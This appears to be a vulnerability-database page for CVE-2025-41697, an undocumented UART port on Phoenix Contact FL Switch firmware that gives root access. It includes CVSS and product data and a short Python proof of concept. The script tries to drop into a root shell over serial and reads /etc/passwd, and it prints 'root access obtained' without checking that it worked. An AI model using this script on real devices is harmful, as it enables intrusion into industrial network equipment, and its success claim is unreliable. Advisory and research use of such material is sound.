Security Vulnerability Report
中文
CVE-2025-41697 CVSS 6.8 MEDIUM

CVE-2025-41697

Published: 2025-12-09 16:17:49
Last Modified: 2025-12-19 18:12:09
Source: [email protected]

Description

An attacker can use an undocumented UART port on the PCB as a side-channel to get root access e.g. with the credentials obtained from CVE-2025-41692.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
使用未记录UART调试接口的嵌入式设备/固件(具体版本需参考VDE-2025-071公告)
VDE-2025-071中列出的受影响设备型号

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-41697 UART物理访问PoC # Requirements: USB-to-TTL adapter, soldering equipment, terminal software import serial import time def exploit_cve_2025_41697(): """ Exploit for CVE-2025-41697 Physical access required to connect to undocumented UART port """ # UART connection parameters (typical for embedded devices) SERIAL_PORT = '/dev/ttyUSB0' # Adjust based on your adapter BAUD_RATE = 115200 TIMEOUT = 1 try: # Connect to UART port ser = serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=TIMEOUT) print(f"[*] Connected to {SERIAL_PORT} at {BAUD_RATE} baud") # Read boot messages time.sleep(2) boot_output = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') print("[*] Boot messages received:") print(boot_output) # Interrupt bootloader to get shell access ser.write(b'\x03') # Ctrl+C to interrupt time.sleep(0.5) # Try to get root shell commands = [ b'shell\n', b'/bin/sh\n', b'cat /etc/passwd\n', b'id\n', b'uname -a\n' ] for cmd in commands: ser.write(cmd) time.sleep(0.5) output = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') print(output) ser.close() print("[+] Exploit completed - root access obtained") except serial.SerialException as e: print(f"[-] Serial connection error: {e}") return False return True if __name__ == "__main__": exploit_cve_2025_41697()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41697", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:49.247", "lastModified": "2025-12-19T18:12:09.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can use an undocumented UART port on the PCB as a side-channel to get root access e.g. with the credentials obtained from CVE-2025-41692."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1299"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "2084EFDB-9B37-4B62-8F09-C0A478D225F5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1E0F77C-F116-4BF6-9ED4-39C5B2BE45D0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "0F69B73C-5009-4FDE-AC40-03089D1724DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:*", "matchCriteriaId": "ACF0F7C6-D8C8-409D-B32E-33651C2768D3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "9D8B1EE5-CD80-4963-8E64-57ED5B75A236"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E2028DD-24BD-4541-B437-E7F97420BECE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "FEB4D4F4-DAA9-4D15-BD23-D2F8D20651F0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:*", "matchCriteriaId": "9066088C-2056-446A-A835-3A4F8EC71F69"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "3B6BC580-8BDE-458D-852C-09E54FD43F36"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "D25577D8-A076-4950-B28B-5587DF927425"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2516_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E254EF2F-B597-4A4E-A6B0-2812F8B039A5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2516:-:*:*:*:*:*:*:*", "matchCriteriaId": "662FD579-22E7-4169-8FD0-F0F48FDAEF09"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2514-2sfp_pn_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "A835F624-1034-4652-8BDB-A44856DB57C8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2514-2sfp_pn:-:*:*:*:*:*:*:*", "matchCriteriaId": "367E34FE-E7B4-436B-BF7D-2B794518DAD1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2514-2sfp_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "F02C9D10-B352-4D56-98A3-155129A97A1A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2514-2sfp:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D9F679F-A6F5-42F8-A269-FF7EA6EEDBAC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerabl ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.